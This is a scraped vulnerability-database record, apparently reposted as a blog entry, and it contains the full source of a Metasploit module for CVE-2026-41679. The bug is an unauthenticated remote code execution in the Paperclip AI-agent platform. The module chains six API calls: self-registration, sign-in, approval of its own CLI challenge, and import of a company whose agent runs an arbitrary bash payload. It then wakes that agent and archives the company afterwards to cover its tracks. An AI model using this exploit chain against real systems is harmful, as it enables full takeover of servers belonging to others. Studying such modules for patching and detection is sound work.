{“lastseen”:”2026-06-12T19:28:03″,”description”:”Paperclip is the operating system for your AI company. You set the goals, hire AI agents as employees, and watch them plan and execute work. Prior to version 2026.410.0, Paperclip allows for an unauthenticated RCE, tracked as CVE-2026-41679. An…”,”published”:”2026-06-12T19:02:08″,”modified”:”2026-06-12T19:02:08″,”type”:”metasploit”,”title”:”Paperclip AI RCE using a chain of six API calls (CVE-2026-41679).”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-PAPERCLIPAI_UNAUTH_RCE_CVE_2026_41679-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-41679″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Paperclip AI RCE using a chain of six API calls (CVE-2026-41679).’,\\n ‘Description’ =\\u003e %q{\\n Paperclip is the operating system for your AI company.\\n You set the goals, hire AI agents as employees, and watch them plan and execute work.\\n Prior to version 2026.410.0, Paperclip allows for an unauthenticated RCE, tracked as CVE-2026-41679.\\n An unauthenticated attacker can achieve full remote code execution on any network-accessible Paperclip\\n instance running in authenticated mode with default configuration. The entire chain is six API calls.\\n },\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’, # Metasploit module\\n ‘Sagilayani https:\/\/github.com\/sagilayani’ # Discovery\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-41679’],\\n [‘GHSA’, ‘GHSA-68qg-g8mg-6pr7’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/86rSV7hsXi\/cve-2026-41679’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘osx’],\\n ‘Privileged’ =\\u003e false,\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘osx’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘Payload’ =\\u003e {\\n ‘Encoder’ =\\u003e ‘cmd\/base64’,\\n ‘BadChars’ =\\u003e \\”\\\\x20\\” # no space\\n }\\n }\\n ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2026-04-10’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e false,\\n ‘RPORT’ =\\u003e 3100\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Path to the Paperclip instance’, ‘\/’])\\n ])\\n end\\n\\n # Check if Paperclip instance is running and get the Paperclip version if published\\n # return version number or ‘N\/A’ (NOT AVAILABLE) else nil\\n def get_paperclip_version\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘health’)\\n })\\n return unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘status’) \\u0026\\u0026 res.body.include?(‘deploymentMode’)\\n\\n # check for version\\n if res.body.include?(‘version’)\\n res_json = res.get_json_document\\n res_json[‘version’] unless res_json.blank?\\n else\\n ‘N\/A’\\n end\\n end\\n\\n # CVE-2026-41679: Unauthenticated command injection leading to RCE via a chain of six API calls\\n def execute_payload(cmd, _opts = {})\\n # randomize email address, name and password to be used in POST requests\\n email = Rex::Text.rand_mail_address\\n email_array = email.split(‘@’)\\n name = email_array[0].split(‘.’)[0]\\n password = Rex::Text.rand_text_alphanumeric(12..20)\\n\\n # 1. sign-up and register with a new user and password\\n vprint_status(‘Step 1: sign-up and register a new user.’)\\n vprint_good(\\”user =\\u003e #{email}, password =\\u003e #{password}\\”)\\n post_data = {\\n email: email.to_s,\\n password: password.to_s,\\n name: name.to_s\\n }.to_json\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘auth’, ‘sign-up’, ’email’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e post_data.to_s\\n })\\n unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘createdAt’)\\n print_error(‘Step 1 failed: sign-up and register a new user.’)\\n return\\n end\\n\\n # 2. Sign in with registered e-mail and password and get session cookie from the Set-Cookie header.\\n vprint_status(‘Step 2: sign-in with the new user credentials and get a session-cookie.’)\\n post_data = {\\n email: email.to_s,\\n password: password.to_s\\n }.to_json\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘auth’, ‘sign-in’, ’email’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e post_data.to_s\\n })\\n unless res\\u0026.code == 200 \\u0026\\u0026 res.get_cookies \\u0026\\u0026 res.body.include?(‘token’)\\n print_error(‘Step 2 failed: sign-in with new user credentials.’)\\n return\\n end\\n\\n cookie = res.get_cookies\\n vprint_good(\\”cookie =\\u003e #{cookie}\\”)\\n\\n # 3. create a CLI challenge and grab the id, token and boardApiToken\\n vprint_status(‘Step 3: create a CLI challenge and get an API token.’)\\n command = Rex::Text.rand_text_alpha(6..8)\\n post_data = {\\n command: command.to_s\\n }.to_json\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘cli-auth’, ‘challenges’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e post_data.to_s\\n })\\n unless res\\u0026.code == 201 \\u0026\\u0026 res.body.include?(‘token’) \\u0026\\u0026 res.body.include?(‘boardApiToken’) \\u0026\\u0026 res.body.include?(‘id’)\\n print_error(‘Step 3 failed: create CLI challenge and get an API token.’)\\n return\\n end\\n\\n res_json = res.get_json_document\\n return if res_json.blank?\\n\\n id = res_json[‘id’]\\n token = res_json[‘token’]\\n @board_api_token = res_json[‘boardApiToken’]\\n vprint_good(\\”API token =\\u003e #{@board_api_token}\\”)\\n\\n # 4. Approve in your own session using the token, id and session cookie\\n # We will need to add the Origin header for next API calls otherwise they will fail\\n vprint_status(‘Step 4: approve the challenge in your session.’)\\n\\n @origin = \\”#{datastore[‘ssl’] ? ‘https’ : ‘http’}:\/\/#{datastore[‘rhost’]}:#{datastore[‘rport’]}\\”\\n post_data = {\\n token: token.to_s\\n }.to_json\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘cli-auth’, ‘challenges’, id.to_s, ‘approve’),\\n ‘headers’ =\\u003e {\\n ‘Origin’ =\\u003e @origin\\n },\\n ‘cookie’ =\\u003e cookie.to_s,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e post_data.to_s\\n })\\n unless res\\u0026.code == 200 \\u0026\\u0026 !res.body.include?(‘error’)\\n print_error(‘Step 4 failed: approve the challenge in your session.’)\\n return\\n end\\n\\n # 5. Create a company and deploy an agent via import (authorization bypass)\\n # This will configure the payload that will be executed by the process agent\\n vprint_status(‘Step 5: create a company and deploy an agent with payload via import (authorization bypass).’)\\n vprint_good(\\”payload =\\u003e #{cmd}\\”)\\n post_data = {\\n source: {\\n type: ‘inline’,\\n files: {\\n ‘COMPANY.md’: \\”—\\\\nname: MI6\\\\nslug: MI6\\\\n—\\\\nx\\”,\\n ‘agents\/007\/AGENTS.md’: \\”—\\\\nkind: agent\\\\nname: 007\\\\nslug: 007\\\\nrole: engineer\\\\n—\\\\nx\\”,\\n ‘.paperclip.yaml’: \\”agents:\\\\n 007:\\\\n icon: terminal\\\\n adapter:\\\\n type: process\\\\n config:\\\\n command: bash\\\\n args:\\\\n – -c\\\\n – #{cmd}\\”\\n }\\n },\\n target: { mode: ‘new_company’, newCompanyName: ‘MI6’ },\\n include: { company: true, agents: true },\\n agents: ‘all’\\n }.to_json\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘companies’, ‘import’),\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e \\”Bearer #{@board_api_token}\\”,\\n ‘Origin’ =\\u003e @origin\\n },\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e post_data.to_s\\n })\\n unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘id’)\\n print_error(‘Step 5 failed: create a company and deploy an agent with payload via import.’)\\n return\\n end\\n\\n res_json = res.get_json_document\\n return if res_json.blank?\\n\\n agent = res_json[‘agents’]\\u0026.first\\n agent_id = agent\\u0026.dig(‘id’)\\n @company_id = res_json[‘company’][‘id’]\\n vprint_good(\\”company_id =\\u003e #{@company_id}, agent_id =\\u003e #{agent_id}\\”)\\n\\n # 6. Run the agent and trigger the payload\\n vprint_status(‘Step 6: run the agent and trigger the payload. You should get a session now ;-).’)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘agents’, agent_id.to_s, ‘wakeup’),\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e \\”Bearer #{@board_api_token}\\”,\\n ‘Origin’ =\\u003e @origin\\n },\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e nil\\n })\\n unless res\\u0026.code == 202\\n print_error(‘Step 6 failed: run the agent and trigger the payload.’)\\n end\\n end\\n\\n # try to archive the company and agent payload to cover our tracks\\n def cleanup\\n super\\n # check if payload should be cleaned\\n unless @company_id.nil?\\n vprint_status(‘Cleaning up the mess…’)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘api’, ‘companies’, @company_id.to_s, ‘archive’),\\n ‘headers’ =\\u003e {\\n ‘Authorization’ =\\u003e \\”Bearer #{@board_api_token}\\”,\\n ‘Origin’ =\\u003e @origin\\n },\\n ‘ctype’ =\\u003e ‘application\/json’\\n })\\n if res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘archived’)\\n print_good(‘Company and agent payload has been successfully archived.’)\\n else\\n print_warning(‘Company and agent payload not archived. Try to remove it manually.’)\\n end\\n end\\n end\\n\\n def check\\n version = get_paperclip_version\\n return CheckCode::Safe(‘Can not find a Paperclip instance running.’) if version.nil?\\n return CheckCode::Detected(‘No Paperclip version found.’) if version == ‘N\/A’\\n\\n version = Rex::Version.new(version)\\n if version \\u003e= Rex::Version.new(‘2026.410.0’)\\n return CheckCode::Safe(\\”Paperclip version #{version}\\”)\\n end\\n\\n CheckCode::Appears(\\”Paperclip version #{version}\\”)\\n end\\n\\n def exploit\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n execute_payload(payload.encoded)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/paperclipai_unauth_rce_cve_2026_41679.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/paperclipai_unauth_rce_cve_2026_41679\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-12T19:28:03″,”description”:”Paperclip is the operating system for your AI company. You set the goals, hire AI agents as employees, and watch them plan and execute work….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-62313","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n